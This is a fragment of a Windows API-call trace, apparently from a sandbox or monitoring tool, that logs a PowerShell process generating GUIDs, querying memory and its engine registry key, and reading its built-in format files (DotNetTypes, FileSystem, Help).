	[0810.834] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0xe87b2dd, Data2=0xa258, Data3=0x4c21, Data4=([0]=0xa6, [1]=0x31, [2]=0x45, [3]=0x34, [4]=0xb2, [5]=0xa, [6]=0x1, [7]=0x3a))) returned 0x0
	[0810.835] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x920c1c2e, Data2=0xb125, Data3=0x4bb6, Data4=([0]=0x94, [1]=0x7, [2]=0x40, [3]=0x79, [4]=0x2e, [5]=0x4f, [6]=0xc7, [7]=0x96))) returned 0x0
	[0810.835] VirtualQuery (in: lpAddress=0x24bf10, lpBuffer=0x24cdd0, dwLength=0x30 | out: lpBuffer=0x24cdd0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0810.836] VirtualQuery (in: lpAddress=0x24bf10, lpBuffer=0x24cdd0, dwLength=0x30 | out: lpBuffer=0x24cdd0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0810.837] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0xbc95bead, Data2=0x2dd8, Data3=0x4309, Data4=([0]=0x85, [1]=0xd9, [2]=0xa0, [3]=0x49, [4]=0x39, [5]=0xd8, [6]=0x39, [7]=0xe5))) returned 0x0
	[0810.840] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0xab1a5938, Data2=0x8410, Data3=0x45da, Data4=([0]=0x9a, [1]=0x96, [2]=0x9d, [3]=0x23, [4]=0x54, [5]=0xed, [6]=0xf5, [7]=0xe0))) returned 0x0
	[0810.840] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0xb0e1fa1c, Data2=0x753e, Data3=0x4181, Data4=([0]=0xaf, [1]=0x6c, [2]=0x99, [3]=0x49, [4]=0x1e, [5]=0xde, [6]=0xfd, [7]=0xa2))) returned 0x0
	[0810.840] VirtualQuery (in: lpAddress=0x24b7d0, lpBuffer=0x24c690, dwLength=0x30 | out: lpBuffer=0x24c690*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0810.841] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0xa4eb4a, Data2=0x87e0, Data3=0x429f, Data4=([0]=0x8d, [1]=0x85, [2]=0x48, [3]=0xde, [4]=0x4c, [5]=0x6b, [6]=0x9e, [7]=0xff))) returned 0x0
	[0810.841] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x8189ffd2, Data2=0x3ca, Data3=0x458a, Data4=([0]=0xa3, [1]=0xd9, [2]=0x59, [3]=0x45, [4]=0xd8, [5]=0xf, [6]=0xbf, [7]=0xa1))) returned 0x0
	[0810.841] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x304
	[0810.841] GetFileType (hFile=0x304) returned 0x1
	[0810.841] SetErrorMode (uMode=0x1) returned 0x1
	[0810.841] GetFileType (hFile=0x304) returned 0x1
	[0811.854] ReadFile (in: hFile=0x304, lpBuffer=0x341fea0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x341fea0*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0811.855] ReadFile (in: hFile=0x304, lpBuffer=0x341fea0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x341fea0*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0811.855] ReadFile (in: hFile=0x304, lpBuffer=0x341fea0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x341fea0*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0811.855] ReadFile (in: hFile=0x304, lpBuffer=0x341fea0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x341fea0*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0811.855] ReadFile (in: hFile=0x304, lpBuffer=0x341fea0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x341fea0*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0811.856] ReadFile (in: hFile=0x304, lpBuffer=0x341fea0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x341fea0*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0811.856] ReadFile (in: hFile=0x304, lpBuffer=0x341fea0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x341fea0*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0811.856] ReadFile (in: hFile=0x304, lpBuffer=0x341fea0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x341fea0*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0811.858] ReadFile (in: hFile=0x304, lpBuffer=0x341fea0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x341fea0*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0811.858] ReadFile (in: hFile=0x304, lpBuffer=0x341fea0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x341fea0*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0811.859] ReadFile (in: hFile=0x304, lpBuffer=0x341fea0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x341fea0*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0811.859] ReadFile (in: hFile=0x304, lpBuffer=0x341fea0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x341fea0*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0811.860] ReadFile (in: hFile=0x304, lpBuffer=0x341fea0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x341fea0*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0811.860] ReadFile (in: hFile=0x304, lpBuffer=0x341fea0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x341fea0*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0811.860] ReadFile (in: hFile=0x304, lpBuffer=0x341fea0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x341fea0*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0811.861] ReadFile (in: hFile=0x304, lpBuffer=0x341fea0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x341fea0*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0811.864] ReadFile (in: hFile=0x304, lpBuffer=0x341fea0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x341fea0*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0811.865] ReadFile (in: hFile=0x304, lpBuffer=0x341fea0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x341fea0*, lpNumberOfBytesRead=0x24d238*=0xbce, lpOverlapped=0x0) returned 1
	[0811.865] ReadFile (in: hFile=0x304, lpBuffer=0x341f5d6, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x341f5d6*, lpNumberOfBytesRead=0x24d238*=0x0, lpOverlapped=0x0) returned 1
	[0811.865] ReadFile (in: hFile=0x304, lpBuffer=0x341fea0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x341fea0*, lpNumberOfBytesRead=0x24d238*=0x0, lpOverlapped=0x0) returned 1
	[0811.866] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d2c8 | out: phkResult=0x24d2c8*=0x304) returned 0x0
	[0811.866] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d24c, lpData=0x0, lpcbData=0x24d248*=0x0 | out: lpType=0x24d24c*=0x1, lpData=0x0, lpcbData=0x24d248*=0x56) returned 0x0
	[0811.866] CoTaskMemAlloc (cb=0x5a) returned 0x1b7f8c30
	[0811.866] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d21c, lpData=0x1b7f8c30, lpcbData=0x24d218*=0x56 | out: lpType=0x24d21c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24d218*=0x56) returned 0x0
	[0811.866] CoTaskMemFree (pv=0x1b7f8c30) 
	[0811.866] RegCloseKey (hKey=0x304) returned 0x0
	[0811.866] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0811.866] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0811.867] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x4217b91d, Data2=0x9011, Data3=0x406a, Data4=([0]=0x85, [1]=0x2f, [2]=0x7e, [3]=0x6d, [4]=0xca, [5]=0xa6, [6]=0xee, [7]=0x30))) returned 0x0
	[0811.868] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x4f934ab7, Data2=0xe97d, Data3=0x4236, Data4=([0]=0xbe, [1]=0x9a, [2]=0xcd, [3]=0x49, [4]=0xa, [5]=0x12, [6]=0x89, [7]=0x30))) returned 0x0
	[0811.868] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0xf74e1f40, Data2=0x76e4, Data3=0x459a, Data4=([0]=0x8d, [1]=0xf4, [2]=0xcc, [3]=0x1c, [4]=0x9a, [5]=0x87, [6]=0x4, [7]=0x43))) returned 0x0
	[0811.868] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x42f5fb16, Data2=0xd26, Data3=0x42ce, Data4=([0]=0xb1, [1]=0xb1, [2]=0x1f, [3]=0xba, [4]=0x5c, [5]=0xf1, [6]=0x87, [7]=0x68))) returned 0x0
	[0811.868] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x552703eb, Data2=0x157a, Data3=0x4527, Data4=([0]=0xbc, [1]=0xea, [2]=0x94, [3]=0xcc, [4]=0xf9, [5]=0x2e, [6]=0x9b, [7]=0x52))) returned 0x0
	[0811.868] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x63a5beda, Data2=0x7bff, Data3=0x474b, Data4=([0]=0xa1, [1]=0xa6, [2]=0x3d, [3]=0x43, [4]=0x4e, [5]=0x61, [6]=0x43, [7]=0x54))) returned 0x0
	[0811.868] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0xf9cae714, Data2=0x9758, Data3=0x4fd2, Data4=([0]=0x8e, [1]=0xf1, [2]=0xd5, [3]=0x83, [4]=0x52, [5]=0x7e, [6]=0x94, [7]=0x9b))) returned 0x0
	[0811.868] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x4fada94b, Data2=0xb4fb, Data3=0x4d8e, Data4=([0]=0xa2, [1]=0x5b, [2]=0xd6, [3]=0xd8, [4]=0x22, [5]=0x38, [6]=0x45, [7]=0x20))) returned 0x0
	[0811.869] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0xc25c8496, Data2=0x5f82, Data3=0x4eee, Data4=([0]=0x8a, [1]=0xd3, [2]=0xa1, [3]=0xe, [4]=0x5b, [5]=0x3b, [6]=0xf2, [7]=0xd8))) returned 0x0
	[0811.869] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x70e75ebc, Data2=0xd5b4, Data3=0x4772, Data4=([0]=0x9e, [1]=0x2a, [2]=0x5d, [3]=0x2d, [4]=0x58, [5]=0xf9, [6]=0x83, [7]=0x9c))) returned 0x0
	[0811.869] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0xcda6bab2, Data2=0xbc61, Data3=0x46f0, Data4=([0]=0xbf, [1]=0xf0, [2]=0xff, [3]=0x32, [4]=0x9d, [5]=0x1e, [6]=0x45, [7]=0xcc))) returned 0x0
	[0811.869] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x89e1915, Data2=0xe60b, Data3=0x4edd, Data4=([0]=0x84, [1]=0x21, [2]=0xc1, [3]=0xc, [4]=0x3c, [5]=0xbd, [6]=0x5d, [7]=0xfa))) returned 0x0
	[0811.869] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x73607b45, Data2=0xb266, Data3=0x4240, Data4=([0]=0x9a, [1]=0x8, [2]=0xd8, [3]=0x8a, [4]=0x22, [5]=0x33, [6]=0x66, [7]=0xc6))) returned 0x0
	[0811.870] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x313c3482, Data2=0x24db, Data3=0x4ecb, Data4=([0]=0xa3, [1]=0xd0, [2]=0x7b, [3]=0x80, [4]=0xbe, [5]=0xe4, [6]=0x3a, [7]=0xa0))) returned 0x0
	[0811.870] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0xd6c97746, Data2=0x3fe1, Data3=0x48db, Data4=([0]=0x93, [1]=0x79, [2]=0x1d, [3]=0xd1, [4]=0x4c, [5]=0xaf, [6]=0xd8, [7]=0x5c))) returned 0x0
	[0811.870] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0xbb5c1577, Data2=0xc923, Data3=0x45f7, Data4=([0]=0x8a, [1]=0x5, [2]=0x9f, [3]=0xf1, [4]=0x36, [5]=0x37, [6]=0x8b, [7]=0x2f))) returned 0x0
	[0811.870] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x1d6f098e, Data2=0x6335, Data3=0x437f, Data4=([0]=0xbd, [1]=0x7d, [2]=0x9d, [3]=0x2, [4]=0x4d, [5]=0xad, [6]=0x4b, [7]=0xce))) returned 0x0
	[0811.870] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x2954af1, Data2=0xd688, Data3=0x4150, Data4=([0]=0x81, [1]=0xaa, [2]=0x3b, [3]=0x76, [4]=0x57, [5]=0x11, [6]=0xc1, [7]=0x6f))) returned 0x0
	[0811.870] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x2de59545, Data2=0xec88, Data3=0x48a7, Data4=([0]=0x85, [1]=0xd7, [2]=0x87, [3]=0xda, [4]=0x30, [5]=0xa6, [6]=0xc1, [7]=0xdc))) returned 0x0
	[0811.870] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0xc7fa85f0, Data2=0x96e3, Data3=0x4fda, Data4=([0]=0xae, [1]=0xf6, [2]=0x21, [3]=0x9e, [4]=0x6, [5]=0xb7, [6]=0xb6, [7]=0x30))) returned 0x0
	[0811.871] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0xbc66922d, Data2=0x3cb3, Data3=0x4c23, Data4=([0]=0xa6, [1]=0x35, [2]=0x98, [3]=0xcb, [4]=0xd3, [5]=0x74, [6]=0x84, [7]=0x48))) returned 0x0
	[0811.871] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x9a4df4ad, Data2=0xbf68, Data3=0x4500, Data4=([0]=0xb8, [1]=0x66, [2]=0xe4, [3]=0x1c, [4]=0x9a, [5]=0xe0, [6]=0xbd, [7]=0xaa))) returned 0x0
	[0811.871] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0xf6665605, Data2=0xe106, Data3=0x44e4, Data4=([0]=0x9f, [1]=0x5d, [2]=0x7d, [3]=0xa2, [4]=0x24, [5]=0x7e, [6]=0x99, [7]=0xd))) returned 0x0
	[0811.871] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x9be639ae, Data2=0x5ec6, Data3=0x49e4, Data4=([0]=0x97, [1]=0xda, [2]=0xe6, [3]=0xce, [4]=0xb4, [5]=0xfe, [6]=0xeb, [7]=0x78))) returned 0x0
	[0811.871] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0xe2da28dc, Data2=0xa5a, Data3=0x40db, Data4=([0]=0xa9, [1]=0x64, [2]=0x52, [3]=0xa0, [4]=0x88, [5]=0x5d, [6]=0xe2, [7]=0x1a))) returned 0x0
	[0811.872] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0xdbf7171e, Data2=0x1296, Data3=0x4af9, Data4=([0]=0xb3, [1]=0x7e, [2]=0x6a, [3]=0x5d, [4]=0x51, [5]=0xa, [6]=0xb, [7]=0x2a))) returned 0x0
	[0811.872] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x476f7d3d, Data2=0xb8bc, Data3=0x4889, Data4=([0]=0xb3, [1]=0x2, [2]=0xdf, [3]=0xd7, [4]=0xe7, [5]=0xa6, [6]=0x7b, [7]=0x2d))) returned 0x0
	[0811.873] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0xa9275efd, Data2=0x3f6e, Data3=0x4ae1, Data4=([0]=0x9a, [1]=0x2b, [2]=0xee, [3]=0x36, [4]=0x70, [5]=0xe4, [6]=0xe4, [7]=0x21))) returned 0x0
	[0811.873] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x19c02e03, Data2=0xa5f5, Data3=0x44ac, Data4=([0]=0x96, [1]=0x89, [2]=0xf5, [3]=0x61, [4]=0xf4, [5]=0xb, [6]=0x26, [7]=0x2d))) returned 0x0
	[0811.873] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0xc5c71775, Data2=0xfb76, Data3=0x4602, Data4=([0]=0x93, [1]=0xf3, [2]=0x37, [3]=0x8b, [4]=0x91, [5]=0x6, [6]=0x69, [7]=0x5a))) returned 0x0
	[0811.873] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x9fd35a73, Data2=0xb2ef, Data3=0x43b8, Data4=([0]=0xb4, [1]=0x67, [2]=0x5, [3]=0xfa, [4]=0x3b, [5]=0x58, [6]=0x1d, [7]=0xb5))) returned 0x0
	[0811.874] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x26a2ac2b, Data2=0xffbd, Data3=0x476f, Data4=([0]=0xab, [1]=0xb3, [2]=0x1f, [3]=0x30, [4]=0x10, [5]=0x72, [6]=0xed, [7]=0x3c))) returned 0x0
	[0811.874] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x103a62d6, Data2=0x123f, Data3=0x454d, Data4=([0]=0xb9, [1]=0xf8, [2]=0x7c, [3]=0x1f, [4]=0xaf, [5]=0x20, [6]=0x71, [7]=0xc9))) returned 0x0
	[0811.874] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x7247871f, Data2=0x18d2, Data3=0x4814, Data4=([0]=0xb2, [1]=0x15, [2]=0x87, [3]=0x99, [4]=0x5d, [5]=0x14, [6]=0xee, [7]=0xed))) returned 0x0
	[0811.875] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x9229733f, Data2=0x6623, Data3=0x43eb, Data4=([0]=0xb9, [1]=0x7a, [2]=0xc4, [3]=0x5, [4]=0x5c, [5]=0xd1, [6]=0x31, [7]=0x2f))) returned 0x0
	[0811.875] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x8c7d1c1a, Data2=0xbf48, Data3=0x4335, Data4=([0]=0x84, [1]=0x3, [2]=0x95, [3]=0xa1, [4]=0x14, [5]=0x1d, [6]=0x53, [7]=0xef))) returned 0x0
	[0811.879] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0xebee3f65, Data2=0xef11, Data3=0x4efd, Data4=([0]=0xab, [1]=0xdd, [2]=0x2f, [3]=0x5, [4]=0x8e, [5]=0xcf, [6]=0x18, [7]=0x3))) returned 0x0
	[0811.879] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x304
	[0811.880] GetFileType (hFile=0x304) returned 0x1
	[0811.880] SetErrorMode (uMode=0x1) returned 0x1
	[0811.880] GetFileType (hFile=0x304) returned 0x1
	[0811.880] ReadFile (in: hFile=0x304, lpBuffer=0x3530660, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x3530660*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0811.882] ReadFile (in: hFile=0x304, lpBuffer=0x3530660, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x3530660*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0811.883] ReadFile (in: hFile=0x304, lpBuffer=0x3530660, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x3530660*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0811.883] ReadFile (in: hFile=0x304, lpBuffer=0x3530660, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x3530660*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0811.885] ReadFile (in: hFile=0x304, lpBuffer=0x3530660, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x3530660*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0811.885] ReadFile (in: hFile=0x304, lpBuffer=0x3530660, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x3530660*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0811.885] ReadFile (in: hFile=0x304, lpBuffer=0x3530660, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x3530660*, lpNumberOfBytesRead=0x24d238*=0x119, lpOverlapped=0x0) returned 1
	[0811.885] ReadFile (in: hFile=0x304, lpBuffer=0x3530660, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x3530660*, lpNumberOfBytesRead=0x24d238*=0x0, lpOverlapped=0x0) returned 1
	[0813.157] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d2c8 | out: phkResult=0x24d2c8*=0x304) returned 0x0
	[0813.158] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d24c, lpData=0x0, lpcbData=0x24d248*=0x0 | out: lpType=0x24d24c*=0x1, lpData=0x0, lpcbData=0x24d248*=0x56) returned 0x0
	[0813.158] CoTaskMemAlloc (cb=0x5a) returned 0x1b7f8c30
	[0813.158] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d21c, lpData=0x1b7f8c30, lpcbData=0x24d218*=0x56 | out: lpType=0x24d21c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24d218*=0x56) returned 0x0
	[0813.158] CoTaskMemFree (pv=0x1b7f8c30) 
	[0813.158] RegCloseKey (hKey=0x304) returned 0x0
	[0813.158] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0813.158] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0813.159] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0xf4796d4c, Data2=0xd4f7, Data3=0x427b, Data4=([0]=0x87, [1]=0x26, [2]=0x77, [3]=0x87, [4]=0xb6, [5]=0x30, [6]=0x63, [7]=0xc6))) returned 0x0
	[0813.159] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0xe7a97e40, Data2=0x6c91, Data3=0x4278, Data4=([0]=0x80, [1]=0xd9, [2]=0x3b, [3]=0xf5, [4]=0xb5, [5]=0x27, [6]=0xab, [7]=0xdb))) returned 0x0
	[0813.159] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x86e2c796, Data2=0x756d, Data3=0x4c06, Data4=([0]=0xa0, [1]=0xe1, [2]=0x61, [3]=0xdd, [4]=0x5b, [5]=0x2e, [6]=0x68, [7]=0x84))) returned 0x0
	[0813.160] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x235556e3, Data2=0x1be4, Data3=0x49e7, Data4=([0]=0x96, [1]=0x65, [2]=0x59, [3]=0xce, [4]=0x1a, [5]=0xe6, [6]=0xc2, [7]=0x56))) returned 0x0
	[0813.160] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x304
	[0813.160] GetFileType (hFile=0x304) returned 0x1
	[0813.160] SetErrorMode (uMode=0x1) returned 0x1
	[0813.160] GetFileType (hFile=0x304) returned 0x1
	[0813.160] ReadFile (in: hFile=0x304, lpBuffer=0x33d21f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x33d21f8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
